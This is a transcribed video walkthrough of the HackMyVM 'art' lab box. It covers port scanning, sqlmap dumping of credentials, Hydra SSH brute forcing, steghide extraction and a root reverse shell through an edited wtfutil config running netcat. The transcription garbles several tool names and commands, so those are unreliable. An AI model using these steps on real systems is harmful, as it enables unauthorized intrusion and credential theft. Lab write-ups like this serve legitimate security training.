Yo, what's going on, guys? In this video, we're going to be doing art from HackMyVm. This is box written about easy. And yeah, let's get on to the video. So I'm going to start my speed my terminal here. I'm starting running a data discover my star 10.0.0.1/24/IT0. Doing this, we do get IP in the box 10.0.0.141. So do Control Shift Z, so we're MM scan. So do MM -C for default scripts, -Z for information, scan out ports of the IP. Doing this, I'll do -V verbose. Look at the ports, we do port even for HTTP and also ports we do even for SSH. Some servers in port 80. We do have a HackMyVm gallery, which does seem like we do have just a gallery of pictures here. I'm going to control use source code. We do have a comment here, which is we do need to solve the tag parameter problem. We do have 4 images also. I'm going to start by doing some more numeration. So do Control Shift Z. We're going to go buster the remote device here to the IP address. We'll do -w for /user share or list or buster directory. 2.2 medium.txt with extensions HTML, TXT, and also PHP. Looking back at the ports, 22.4 SSH, this is running Debian. 40.4 HTTP, this is NGINX 1.18.0. And we don't have anything for the server header. Same thing as port 80 for the version of NGINX. We do have a index.php, so I'm just going to copy this. We did have a parameter. If you're doing a parameter, usually we do have like index. Sometimes you have like a file is equal to, you know, like an LFI, etc/password. But in this case, we do have a parameter here, which it did tell us the tag parameter. So do question mark tag, and we do get a blank page. Doesn't seem like we can get an LFI. I'm also going to be testing out for just a quote for SQL injection. Doing this, I'm going to start by using SQL map. Test for SQL injection. So I'm going to do SQL map. So we'll do SQL map. We'll do -u for the URL. We can specify just the tag. We don't really need the. We don't need to specify this URL encoded. We'll do -dbs to specify the databases. We'll do -batch. We do have 2 available databases, and it is vulnerable to SQL injection. We can specify -d and also -t to specify the tables. -t is for the tables inside the databases, and also -d specify the database. So we have a gallery, which is going to be for -d for the gallery of the database. We want to specify the tables inside that database. So do -tables. Well, you have 2 tables, art and also users. So specify -t. We'll do this for art, or lowercase. We'll do art. We'll do -dump. Just dump tables in there. Also did have a database form, or the table for users. So looking at this, we do have the ID, the tag, and also the image. This is kind of odd because we do have 4 images here. Looking at the source code, if I do Control U, let me just take off the use source. I'll just goes back to index.php. We only do have 4 images here. 1, 2, 3, and 4. We do have another one here for the databases for the table of art, which is DSA32. I believe this is a valid JPEG image, and we do get a picture of a goat. Looking back at this users, we do have a pass and also users. So I'm going to start by brute forcing each user. I'm going to create a user.txt or users.txt. We did have user for Mina, me, Lula, not me, Mona, admin, Lila, and also root. That's going to be our users.txt, which is going to be used for Hydra. I'm going to create a pass.txt. I'm just going to copy each one. I'll put an equals sign here. Doing this, I'm just going to write quit. Now we do have users.txt. Also do have our pass.txt. So I'm going to start by using Hydra. We'll do Hydra -L, capital L, since we're going to be using a list, which can be for users.txt. We'll do -p, which is going to be for pass.txt. We'll do SSH. On 10.0.0.141, we'll do port 22 -I, so we'll start a session. And we can just let Hydra run. We also did have that JPEG, so I'm just going to get this JPEG. I'm pretty sure there's Stego in this image, since it was the only image that was left out. So I'm going to do mkdir for Stego. We'll seed into Stego. I'm just going to get this image. We can use multiple tools for this. We can use like Segrevitas for that, or we can use a StegHide. Before using Segrevitas, I'm going to be using a StegHide. So do StegHide. We'll do -sf or extract -sf for DSA32 JPEG. This seemed like it didn't extract data from guest.txt. And we do have user as lion, and also she loves you as the password. So I'm SSH into lion. We have 10.0.0.141. We did have that password. We do ID. Now we're in lion. So I'm sort of running a sudo myself. We do have a bin WTF util. I'm gonna check the permissions on this. Does seem like we are under by staff 501. We can just run this and see what this is. I'm gonna do minus help. We do have a -config file, which is usually ran like it creates a .config depending on the user that it's ran. So if I run this as lion, we should have a .config. If I do else -la, we don't have a .config. If I do run it, we should have a .config. Also do have module, specify a module. I don't know what this tool is, so I'm going to just start by just doing some looking at documentations for this tool. Maybe there's like a GitHub for this. So looking at this, we do have a, just seem like this displays personal information based on location and also IP address. I don't want this to run, or I might have to blur this out to run this. So I'm just going to run this. I'll do sudo -u, run this as, first I do want to create my own config file. Since we don't have access to like /root, I do want to create my own config file. If I run the sudo myself, I'm just going to run this as lion first. So I'll do sudo -u, run this as lion, which could be for my user, or WTF, util. So it does show my personal information, which I'm just going to blur out. Looking at this, we do have a .config now, which is WTF. We do have this config YML. I'm just going to nano into config YML. It does seem like we can run commands. I'm going to search for CMD, which we do have CMD, which is uptime, and for args. I'm going to start with my own listener. Let's see if I do get a connect back. So do all right at HackMyVm on 9001. I believe I'm going to check what tools we do have on here. So we do have curl. Doesn't seem like we do have curl. Use wget. Do we have netcat? We do have netcat, which should be able to run -c to execute. So I'm just going to nano into config YML. Doing this, I'm going to specify NC. If you never worked with the YML file, we do just specify arguments for that command. So in this case, we'll do 10.0.0.69. We'll do comma, specify by, we'll do comma, specify by the next parameter, which can be for -e. We'll do comma, which is going to be separated by each space. So do netcat, we specify a comma for 9001. We do want to specify another comma here. So basically each space we do 10.0.0.69 followed by the port. We'll execute space. We'll just specify bin/bash. This is just one parameter since there's no space between the bin/bash. There's a space between -e to execute bin/bash. And we're just going to be using netcat. So I'm just going to cat this config. Just to confirm, we do have netcat on 10.0.0.69 9001. We'll execute a bin/bash. So I'm starting doing sudo myself. We did have, if I do -help, we can specify our own config file since by default it is running, if you do run this as root, it's going to be under /root.config. We don't have access to that file, so we're going to specify our own config file running it as root. So do sudo, we'll run this as root. Since we want to execute the netcat command as root, we'll do wtf, we'll do -config, which is going to equal to we'll do /home, the config wtf, config yml. I just want to see if I do get a connect back on 9001. So do you have a sudo -u, we'll run this as root for wtf, for specify that config file, which we did edit. So execute that netcat command, press enter on that, we do ID. So looking at this, it does seem like we don't have a root.txt. So we can just use the find command to find that file, right? So do find, we'll start from the base of the file system. We'll do -type. -type is just going to be for like basically the type of the file, right? In this case, we do have f, which can be file. We'll do -name. -name is going to be from basically the file extension. So I'm just going to do .txt. Press enter on that. And you do see that I do have a var opt root.txt. If I do else myself, you do see that we do have root.txt and var opt root.txt. Well, guys, pretty much in the video. Don't forget to like and subscribe. And I'll catch you guys in the next one. Peace.